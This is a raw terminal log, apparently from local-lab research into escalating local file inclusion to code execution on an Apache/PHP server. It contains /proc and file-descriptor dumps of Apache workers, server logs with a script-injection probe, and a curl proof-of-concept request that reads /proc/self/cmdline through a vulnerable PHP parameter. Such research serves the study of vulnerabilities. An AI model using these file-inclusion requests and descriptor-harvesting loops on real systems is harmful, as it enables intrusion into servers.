# ps aux | grep apache root 14144 0.0 0.6 29016 13280 ? Ss 13:03 0:00 /usr/sbin/apache2 -k start www-data 14149 0.0 0.3 29148 6464 ? S 13:03 0:00 /usr/sbin/apache2 -k start www-data 14150 0.0 0.2 29148 6144 ? S 13:03 0:00 /usr/sbin/apache2 -k start www-data 14151 0.0 0.3 29436 7964 ? S 13:03 0:00 /usr/sbin/apache2 -k start www-data 14152 0.0 0.2 29016 6064 ? S 13:03 0:00 /usr/sbin/apache2 -k start www-data 14153 0.0 0.3 29400 7908 ? S 13:03 0:00 /usr/sbin/apache2 -k start www-data 14154 0.0 0.2 29016 6060 ? S 13:04 0:00 /usr/sbin/apache2 -k start www-data 14156 0.0 0.3 29392 7792 ? S 13:04 0:00 /usr/sbin/apache2 -k start www-data 14158 0.0 0.3 29392 7792 ? S 13:04 0:00 /usr/sbin/apache2 -k start www-data 14159 0.0 0.3 29392 7792 ? S 13:04 0:00 /usr/sbin/apache2 -k start www-data 14160 0.0 0.2 29016 5000 ? S 13:04 0:00 /usr/sbin/apache2 -k start root 14170 0.0 0.0 3120 1316 pts/1 S+ 13:06 0:00 grep apache /proc/$i/environ PATH=/usr/local/bin:/usr/bin:/bin PWD=/root LANG=CSHLVL=1 _=/usr/sbin/apache2 /proc/14160/maps and smaps 00000000-00000000 r-xp 00000000 fd:01 231245 /usr/lib/libexslt.so.0.8.13 00000000-00000000 r-xp 00000000 fd:01 270356 /usr/lib/php5/20060613+lfs/pdo.so 00000000-00000000 r-xp 00000000 fd:01 270353 /usr/lib/php5/20060613+lfs/mysqli.so 00000000-00000000 r-xp 00000000 fd:01 112565 /usr/lib/libmysqlclient.so.15.0.0 00000000-00000000 r-xp 00000000 fd:01 270367 /usr/lib/php5/20060613+lfs/xsl.so 00000000-00000000 r-xp 00000000 fd:01 270352 /usr/lib/php5/20060613+lfs/pdo_mysql.so 00000000-00000000 r-xp 00000000 fd:01 109648 /usr/lib/libmcrypt.so.4.4.7 00000000-00000000 r-xp 00000000 fd:01 270351 /usr/lib/php5/20060613+lfs/mysql.so /proc/14160/mounts and mountstats rootfs / rootfs rw 0 0 none /sys sysfs rw 0 0 none /proc proc rw 0 0 udev /dev tmpfs rw 0 0 /dev/mapper/visa-root / ext3 rw,errors=remount-ro,data=ordered 0 0 /dev/mapper/visa-root /dev/.static/dev ext3 rw,errors=remount-ro,data=ordered 0 0 tmpfs /lib/init/rw tmpfs rw,nosuid 0 0 tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0 devpts /dev/pts devpts rw,nosuid,noexec 0 0 /dev/sda1 /boot ext3 rw,nosuid,noexec,data=ordered 0 0 /dev/mapper/visa-home /home ext3 rw,data=ordered 0 0 /dev/mapper/visa-home /var/log ext3 rw,data=ordered 0 0 /dev/mapper/visa-home /usr/src ext3 rw,data=ordered 0 0 /dev/mapper/visa-home /var/lib/mysql ext3 rw,data=ordered 0 0 /dev/mapper/visa-home /tmp ext3 rw,data=ordered 0 0 /proc/$i/stat statm 14160 (apache2) S 14144 14144 14144 0 -1 8512 232 0 0 0 0 0 0 0 20 0 1 0 7096675 29712384 1250 4294967295 1 1 0 0 0 0 0 536875008 134235755 0 0 0 17 1 0 0 0 0 0 status Name: apache2 State: S (sleeping) Tgid: 14160 Pid: 14160 PPid: 14144 TracerPid: 0 Uid: 33 33 33 33 Gid: 33 33 33 33 FDSize: 32 Groups: 33 VmPeak: 29020 kB VmSize: 29016 kB VmLck: 0 kB VmHWM: 5000 kB VmRSS: 5000 kB VmData: 3208 kB VmStk: 84 kB VmExe: 308 kB VmLib: 23312 kB VmPTE: 56 kB CsBase: 60000000 CsLim: 60000000 Threads: 1 SigQ: 0/4294967295 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: 0000000000000000 SigIgn: 0000000020001000 SigCgt: 000000018800466b CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 voluntary_ctxt_switches: 1 nonvoluntary_ctxt_switches: 0 PaX: peMRS 0 1 2 3 4 5 6 7 8 [Tue Jul 01 13:03:58 2008] [notice] ModSecurity for Apache 2.1.5 configured [Tue Jul 01 13:03:59 2008] [notice] Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11 configured -- resuming normal operations visa:~# for i in `ps aux | grep apache | grep -v "grep" | sed "s/ */ /g" | cut -d " " -f 2`; do echo -e "$i\n";ls /proc/$i/fd;cat /proc/$i/fd/2; echo; done /proc/$i/fd/7 [Tue Jun 03 15:38:10 2008] [error] [client 127.0.0.1] File does not exist: /home/www-data/http/favicon.ico [Tue Jun 03 15:38:13 2008] [error] [client 127.0.0.1] attempt to invoke directory as script: /home/www-data/cgi-bin/ [Tue Jun 03 15:49:26 2008] [error] [client 127.0.0.1] script not found or unable to stat: /home/www-data/cgi-bin/aaa [Tue Jun 03 15:50:19 2008] [error] [client 127.0.0.1] script not found or unable to stat: /home/www-data/cgi-bin/javascript alert 123 [Tue Jun 03 15:50:41 2008] [error] [client 127.0.0.1] script not found or unable to stat: /home/www-data/cgi-bin/javascript alert 123 127.0.0.1 - - [17/Apr/2008:17:40:50 -0700] "GET /minded/heads/research.jpg HTTP/1.1" 304 - "http://localhost:8173/minded/advisories.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080311 Iceweasel/2.0.0.13 (Debian-2.0.0.13-0etch1)" 127.0.0.1 - - [17/Apr/2008:17:40:50 -0700] "GET /minded/images/template_15.gif HTTP/1.1" 304 - "http://localhost:8173/minded/template.css" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080311 Iceweasel/2.0.0.13 (Debian-2.0.0.13-0etch1)" 127.0.0.1 - - [17/Apr/2008:17:40:50 -0700] "GET /minded/images/arrows.gif HTTP/1.1" 304 - "http://localhost:8173/minded/template.css" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080311 Iceweasel/2.0.0.13 (Debian-2.0.0.13-0etch1)" 127.0.0.1 - - [17/Apr/2008:17:40:50 -0700] "GET /minded/images/arrows_red.gif HTTP/1.1" 304 - "http://localhost:8173/minded/templa visa:~# for i in `ps aux | grep apache | grep -v "grep" | sed "s/ */ /g" | cut -d " " -f 2`; do echo -e "$i\n";ls /proc/$i/fd;cat /proc/$i/fd/8; echo; done 3128 /usr/sbin/lighttpd-f/etc/lighttpd/lighttpd.conf 3129 /usr/bin/php5-cgi 3130 3131 3132 3133 3134 3135 3136 /usr/bin/php5-cgi 3137 3138 3139 3140 /usr/bin/php4-cgi 3141 3142 3143 /usr/bin/php4-cgi 3223 /usr/bin/php4-cgi 3224 /usr/bin/php4-cgi 3225 /usr/bin/php4-cgi 3226 /usr/bin/php4-cgi 3227 /usr/bin/php4-cgi 3228 /usr/bin/php4-cgi 3229 /usr/bin/php4-cgi 3230 /usr/bin/php4-cgi 3261 /usr/bin/php5-cgi 3262 /usr/bin/php5-cgi 3263 /usr/bin/php5-cgi 3264 /usr/bin/php5-cgi 3265 /usr/bin/php5-cgi 3266 /usr/bin/php5-cgi 3267 /usr/bin/php5-cgi 3268 /usr/bin/php5-cgi --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ curl "http://localhost:8173/hack-lfi2rce_redux/poc.php?path=/proc/self/cmdline" -kis; echo HTTP/1.1 200 OK Date: Tue, 01 Jul 2008 20:04:57 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11 X-Powered-By: PHP/5.2.0-8+etch11 Content-Length: 27 Content-Type: text/html; charset=UTF-8 /usr/sbin/apache2-kstart --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--